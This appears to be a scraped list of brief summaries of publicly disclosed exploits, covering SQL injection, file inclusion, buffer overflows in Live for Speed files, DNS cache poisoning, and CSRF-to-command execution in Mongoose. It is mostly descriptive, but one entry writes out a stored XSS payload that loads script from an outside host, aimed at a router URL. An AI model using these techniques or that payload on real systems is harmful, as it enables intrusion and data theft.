This exploit allows an attacker to execute arbitrary commands on a Windows XP system by exploiting a vulnerability in the mSQL extension. The attacker can bind a TCP shell to a specific port and gain remote access to the target system.
This exploit targets the WFTPD Pro Server 3.21 and causes a Denial of Service (DoS) by sending a specially crafted MLST command. It fills the buffer with 'A's and sends the command repeatedly, increasing the size of the buffer each time. This exploit can crash the server and render it unavailable.
Input passed to the "svr_rootscript" parameter in order/login.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. Successful exploitation requires that "register_globals" is enabled.
This is a Python script that performs DNS cache poisoning. It is based on the Amit Klein paper: http://www.trusteer.com/docs/bind9dns.html. The script predicts the next transaction ID for DNS queries and attempts to poison the cache with malicious responses. The output of the script includes the time, IP, port, ID, query, number of good predicted IDs, and number of errors.
The vulnerability allows an attacker to extract users and admins login information. The exploit involves using a UNION SELECT statement to retrieve the username and password.
The CartWeaver application is vulnerable to SQL injection attacks in the Details.cfm page, specifically in the ProdID parameter. An attacker can manipulate the ProdID parameter to execute arbitrary SQL queries. This can lead to unauthorized access, disclosure of sensitive information, and potential compromise of the application and its data.
This exploit allows for persistent XSS on intelbras routers with firmware WRN 250. The vulnerability can be exploited by injecting a malicious script through the URL http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm. The payload used in the exploit is </script><script src='//elb.me'>. This exploit requires the presence of a PHP script to retrieve the logs.
The exploit takes advantage of a buffer overflow vulnerability in the .spr file format used in Live for Speed. By crafting a specially crafted .spr file, an attacker can overwrite the EIP register and execute arbitrary code. This vulnerability is different from the previously discovered buffer overflow in .mpr files. The .spr files are stored in a separate folder and have a different file structure. The exploit code provided can be compiled using Dev C++ 4.9.9.2. Use caution when handling .spr files as they can be used for malicious purposes.
The vulnerability occurs in Live for speed .ply file due to an overly long number plate string. By exploiting this issue, an attacker can execute malicious shell code by convincing a user to put the .ply file inside their misc folder inside of Lfs2. The buffer overflow occurs when filling the number plate field with over 1000 bytes of buffer.
Remote attackers who can lure a Mongoose web server user into clicking a malicious link or visit attacker controlled web page can execute system commands on the system hosting Mongoose server. However, IF Mongoose web server is installed as service then executing programs e.g. 'calc.exe' may at times crash or fail to appear, but you may see it in Windows taskmgr.exe. Therefore, from my tests commands may become unstable when Mongoose is run as a service. When Mongoose is run standard mode attackers can potentially modify 'Mongoose.conf' and create arbitrary files on server like .PHP etc. to point Mongoose to this as its new 'index' file. Then you need to tell Mongoose its 'access_log_file' is the new attacker generated file, after injecting commands into Mongoose web servers log file that will get executed when log file is later requested. This vulnerability requires CGI interpreter to be already set or some information about the target is known like the CGI path and language 'pl,php,cgi' used, so when we can set to use correct programming language when file is created during initial CRSF attack.
Services By CQR